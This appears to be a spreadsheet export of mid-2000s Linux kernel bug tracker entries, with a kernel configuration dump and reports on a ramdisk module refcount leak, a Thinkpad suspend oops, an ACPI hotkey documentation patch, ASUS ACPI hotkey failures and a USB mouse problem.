CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_SHMEM=y CONFIG_CC_ALIGN_FUNCTIONS=0 CONFIG_CC_ALIGN_LABELS=0 CONFIG_CC_ALIGN_LOOPS=0 CONFIG_CC_ALIGN_JUMPS=0 # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # # Loadable module support # CONFIG_MODULES=y # CONFIG_MODULE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set CONFIG_MPENTIUM4=y # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MEFFICEON is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MGEODEGX1 is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HPET_TIMER=y CONFIG_SMP=y CONFIG_NR_CPUS=2 CONFIG_SCHED_SMT=y CONFIG_PREEMPT=y CONFIG_PREEMPT_BKL=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y CONFIG_X86_MCE_P4THERMAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_X86_REBOOTFIXUPS is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_NOHIGHMEM is not set CONFIG_HIGHMEM4G=y # CONFIG_HIGHMEM64G is not set CONFIG_HIGHMEM=y CONFIG_HIGHPTE=y # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_IRQBALANCE=y CONFIG_HAVE_DEC_LOCK=y # CONFIG_REGPARM is not set CONFIG_SECCOMP=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_PM_DEBUG is not set CONFIG_SOFTWARE_SUSPEND=y CONFIG_PM_STD_PARTITION="" # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_VIDEO=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_IBM is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_X86_PM_TIMER is not set # CONFIG_ACPI_CONTAINER is not set # # APM (Advanced Power Management) BIOS Support # # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCIEPORTBUS is not set # CONFIG_PCI_MSI is not set CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_ISA_DMA_API=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCCARD (PCMCIA/CardBus) support # # CONFIG_PCCARD is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=m # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_GSC is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_PNPACPI=y # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set # CONFIG_BLK_DEV_RAM is not set CONFIG_BLK_DEV_RAM_COUNT=16 CONFIG_INITRAMFS_SOURCE="" CONFIG_LBD=y # CONFIG_CDROM_PKTCDVD is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_ATA_OVER_ETH is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set CONFIG_BLK_DEV_IDEFLOPPY=y # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI Transport Attributes # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # CONFIG_SCSI_ISCSI_ATTRS is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set CONFIG_SCSI_DPT_I2O=m # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set CONFIG_SCSI_SATA=y # CONFIG_SCSI_SATA_AHCI is not set # CONFIG_SCSI_SATA_SVW is not set CONFIG_SCSI_ATA_PIIX=y # CONFIG_SCSI_SATA_NV is not set # CONFIG_SCSI_SATA_PROMISE is not set # CONFIG_SCSI_SATA_QSTOR is not set CONFIG_SCSI_SATA_SX4=m # CONFIG_SCSI_SATA_SIL is not set CONFIG_SCSI_SATA_SIS=m # CONFIG_SCSI_SATA_ULI is not set # CONFIG_SCSI_SATA_VIA is not set # CONFIG_SCSI_SATA_VITESSE is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set CONFIG_SCSI_IPR=m # CONFIG_SCSI_IPR_TRACE is not set # CONFIG_SCSI_IPR_DUMP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set CONFIG_SCSI_QLA2XXX=y # CONFIG_SCSI_QLA21XX is not set # CONFIG_SCSI_QLA22XX is not set # CONFIG_SCSI_QLA2300 is not set # CONFIG_SCSI_QLA2322 is not set # CONFIG_SCSI_QLA6312 is not set # CONFIG_SCSI_LPFC is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # CONFIG_INET_TUNNEL is not set CONFIG_IP_TCPDIAG=y # CONFIG_IP_TCPDIAG_IPV6 is not set # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y # CONFIG_IP_NF_CT_ACCT is not set # CONFIG_IP_NF_CONNTRACK_MARK is not set # CONFIG_IP_NF_CT_PROTO_SCTP is not set # CONFIG_IP_NF_FTP is not set # CONFIG_IP_NF_IRC is not set # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set CONFIG_IP_NF_QUEUE=y CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_IPRANGE=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_RECENT=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y CONFIG_IP_NF_MATCH_OWNER=y # CONFIG_IP_NF_MATCH_ADDRTYPE is not set # CONFIG_IP_NF_MATCH_REALM is not set # CONFIG_IP_NF_MATCH_SCTP is not set # CONFIG_IP_NF_MATCH_COMMENT is not set # CONFIG_IP_NF_MATCH_HASHLIMIT is not set CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y CONFIG_IP_NF_TARGET_TCPMSS=y CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y CONFIG_IP_NF_TARGET_NETMAP=y CONFIG_IP_NF_TARGET_SAME=y # CONFIG_IP_NF_NAT_SNMP_BASIC is not set CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_CLASSIFY=y CONFIG_IP_NF_RAW=m CONFIG_IP_NF_TARGET_NOTRACK=m CONFIG_IP_NF_ARPTABLES=y CONFIG_IP_NF_ARPFILTER=y CONFIG_IP_NF_ARP_MANGLE=y # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # CONFIG_NET_CLS_ROUTE is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_NETDEVICES=y CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # Ethernet (10 or 100Mbit) # # CONFIG_NET_ETHERNET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set CONFIG_R8169=y # CONFIG_R8169_NAPI is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # CONFIG_BNX2 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_SERIAL=y # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set # CONFIG_SERIAL_8250_ACPI is not set CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set CONFIG_AGP_INTEL=y # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set # CONFIG_AGP_EFFICEON is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_I915 is not set # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HPET is not set # CONFIG_HANGCHECK_TIMER is not set # # TPM devices # # CONFIG_TCG_TPM is not set # # I2C support # # CONFIG_I2C is not set # # Dallas's 1-wire bus # # CONFIG_W1 is not set # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # CONFIG_SND_AC97_CODEC=y # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_ATIIXP_MODEM is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SN</t>
  </si>
  <si>
    <t>can't unload rd module after mounting and later umounting a (or several) ramdisk</t>
  </si>
  <si>
    <t>2.6.26</t>
  </si>
  <si>
    <t>2005-07-16 14:47 UTC</t>
  </si>
  <si>
    <t>Pedro J. Ruiz Lopez</t>
  </si>
  <si>
    <t>2009-06-29 12:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 2005.0 Hardware Environment: i686. CPU Athlon XP 2000+ (no overclock). Motherboard Abit NF7 v2. 512Mb RAM (free 300Mb aprox) Software Environment: tty text console Problem Description: I loaded rd.ko and mounted /dev/ram0. Later, I needed to unload the rd module, however something is making use of it and rmmod sais "ERROR: Module rd is in use". In fact, the output of lsmod is... "rd 5184 1" so there is something that prevents rd from unloading. If I mount (and umount) another ramdisk (eg ram1), the output of lsmod is... "rd 5184 2" so the problem accumulates. Steps to reproduce: modprobe rd mke2fs /dev/ramX mount -t ext2 /dev/ramX /mnt/ramdisk umount /mnt/ramdisk rmmod rd (ERROR: Module rd is in use)</t>
  </si>
  <si>
    <t>S3 resume oops with irattach - Thinkpad A21m</t>
  </si>
  <si>
    <t>2005-07-16 15:39 UTC</t>
  </si>
  <si>
    <t>Daniel Smolik</t>
  </si>
  <si>
    <t>2005-11-21 14:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Thinkpad A21m Software Environment: 2.6.12.1 Problem Description: When I try sleep my notebook second time kernel oops. Steps to reproduce: Boot kernel and press sleep button under display two times. ksymoops 2.4.9 on i686 2.6.12.1. Options used -V (default) -k /proc/kallsyms (specified) -l /proc/modules (default) -o /lib/modules/2.6.12.1/ (default) -m /boot/System.map-2.6.12.1 (default) Warning (read_ksyms): no kernel symbols in ksyms, is /proc/kallsyms a valid ksyms file? No modules in ksyms, skipping objects No ksyms, skipping lsmod eax: 00000000 ebx:c039e5cc ecx: 00000000 edx: 00000003 esi: c039e9f8 edi:c039e9f8 ebp: c0320620 esp: ca803e4c ds: 007b es:007b ss:0068 Stack: 00000000 00000000 ca802000 cbf8d028 c020c9be c039e9f8 00000000 c039e9f8 c03a0b08 cbc2eaa8 00000003 c0210658 c03206c0 c039e9f8 cbc2caa8 00000003 00000003 c0215323 cbc2eaa8 00000003 00000002 cbc2eaa8 00000000 c0216dbf Call Trace: [&lt;c020c9be&gt;] uart_suspend_port+0xde/0xf0 [&lt;c0210658&gt;] serial8250_suspend+0x68/0x70 [&lt;c0215323&gt;] paltform_suspend+0x43/0x80 [&lt;c0216dbf&gt;] suspend_device+0xaf/0x0xc0 [&lt;c01bc22a&gt;] kobject_get+0x1a/0x30 [&lt;c0216c3c&gt;] device_suspend+0x6c/0x0x160 [&lt;c0136f47&gt;] suspend_preparde+0x67/0xb0 [&lt;c0137063&gt;] enter_state+0x33/0x70 [&lt;c01e4dff&gt;] acpi_suspend+0x2a/0x3b [&lt;c01e4ef6&gt;] acpi_system_write_sleept+0x72/0x84 [&lt;c015998e&gt;] vfs_write+0xae/0x130 [&lt;c0159ae1&gt;] sys_write+0x51/0x80 [&lt;c0103185&gt;] sys_call+0x7/0xb Code: 2a 39 00 74 18 89 74 24 94 89 1c 24 e8 47 fe ff ff 8b 5c 24 08 8b 74 24 0c Using defaults from ksymoops -t elf32-i386 -a i386 &gt;&gt;&gt;&gt;ebx; c039e5cc &lt;irq_lists+c/380&gt; &gt;&gt;&gt;&gt;esi; c039e9f8 &lt;serial8250_ports+b8/2280&gt; &gt;&gt;&gt;&gt;edi; c039e9f8 &lt;serial8250_ports+b8/2280&gt; &gt;&gt;&gt;&gt;ebp; c0320620 &lt;serial8250_pops+0/50&gt; &gt;&gt;&gt;&gt;esp; ca803e4c &lt;pg0+a456e4c/3fc51400&gt; Trace; c020c9be &lt;uart_suspend_port+de/f0&gt; Trace; c0210658 &lt;serial8250_suspend+68/70&gt; Trace; c0215323 &lt;platform_suspend+43/80&gt; Trace; c0216dbf &lt;suspend_device+af/c0&gt; Trace; c01bc22a &lt;kobject_get+1a/30&gt; Trace; c0216c3c &lt;device_pm_add+6c/a0&gt; Trace; c0136f47 &lt;suspend_prepare+67/b0&gt; Trace; c0137063 &lt;enter_state+33/70&gt; Trace; c01e4dff &lt;acpi_suspend+2a/3b&gt; Trace; c01e4ef6 &lt;acpi_system_write_sleep+72/84&gt; Trace; c015998e &lt;vfs_write+ae/130&gt; Trace; c0159ae1 &lt;sys_write+51/80&gt; Trace; c0103185 &lt;syscall_call+7/b&gt; Code; 00000000 Before first symbol 00000000 &lt;_EIP&gt;: Code; 00000000 Before first symbol 0: 2a 39 sub (%ecx),%bh Code; 00000002 Before first symbol 2: 00 74 18 89 add %dh,0xffffff89(%eax,%ebx,1) Code; 00000006 Before first symbol 6: 74 24 je 2c &lt;_EIP+0x2c&gt; Code; 00000008 Before first symbol 8: 94 xchg %eax,%esp Code; 00000009 Before first symbol 9: 89 1c 24 mov %ebx,(%esp) Code; 0000000c Before first symbol c: e8 47 fe ff ff call fffffe58 &lt;_EIP+0xfffffe58&gt; Code; 00000011 Before first symbol 11: 8b 5c 24 08 mov 0x8(%esp),%ebx Code; 00000015 Before first symbol 15: 8b 74 24 0c mov 0xc(%esp),%esi 1 warning issued. Results may not be reliable.</t>
  </si>
  <si>
    <t>Documentation fix for acpi-hotkey.txt</t>
  </si>
  <si>
    <t>2.6.13-rc3</t>
  </si>
  <si>
    <t>2005-07-17 02:06 UTC</t>
  </si>
  <si>
    <t>A note should be added to acpi-hotkey.txt to mention kernel parameter to enable platform specific acpi modules. Below a little patch reporting Changelog note by Luming Yu &lt;luming.yu@intel.com&gt; --- Documentation/acpi-hotkey.txt.orig 2005-07-17 11:00:54.787351500 +0200 +++ Documentation/acpi-hotkey.txt 2005-07-17 11:03:16.304195750 +0200 @@ -33,3 +33,6 @@ attached to /proc/acpi/hotkey/poll_method, which is dnyamically created. Please use command "cat /proc/acpi/hotkey/polling_method" to retrieve it. + +Note: Use cmdline "acpi_specific_hotkey" to enable legacy platform + specific drivers.</t>
  </si>
  <si>
    <t>asus acpi doesn't work</t>
  </si>
  <si>
    <t>2005-07-17 23:15 UTC</t>
  </si>
  <si>
    <t>Victor</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: ASUS M6N with bios version 0214A Software Environment: up2date Problem Description: asus acpi doesn't work, i compiled it in kernel but asus acpi don't detect notebook model and don't work all hotkey buttons with configure acpid, and don't work DJbar buttons. With 2.6.12.* version all work correctly. Steps to reproduce: install linux kernel version 2.6.13-rc*</t>
  </si>
  <si>
    <t>Peter Ganzhorn</t>
  </si>
  <si>
    <t>USB mouse stops working after inserting USB storage device</t>
  </si>
  <si>
    <t>2005-07-19 14:38 UTC</t>
  </si>
  <si>
    <t>Sander Bouwhuis</t>
  </si>
  <si>
    <t>2006-11-12 12:35 UTC</t>
  </si>
  <si>
